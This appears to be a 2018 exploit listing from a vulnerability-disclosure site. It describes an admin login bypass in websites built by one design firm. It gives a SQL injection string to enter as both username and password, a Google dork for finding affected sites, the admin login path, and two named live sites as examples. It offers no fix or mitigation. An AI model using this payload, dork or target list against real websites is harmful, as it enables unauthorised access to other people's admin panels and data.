Powered byJWA ©2016 Website designed by THADV Admin Login Bypass Vulnerability

2018.06.25

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-592

#################################################################################################
# Exploit Title : Powered byJWA ©2016 Website designed by THADV Admin Login Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 25/06/2018
# Vendor Homepages : jwa.tw ~ thadv.com
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]
#################################################################################################
# Google Dork : intext:''Powered byJWA ©2016 Website designed by THADV''
# Administration Login Path => /login_prod.php
# Exploit :
Username : anything' OR 'x'='x
Password : anything' OR 'x'='x
#################################################################################################
# Example Sites :
dutypower.com/login_prod.php
cmi-mkt.com/login_prod.php
################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Powered byJWA ©2016 Website designed by THADV Admin Login Bypass Vulnerability

Dork: intext:''Powered byJWA ©2016 Website designed by THADV''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.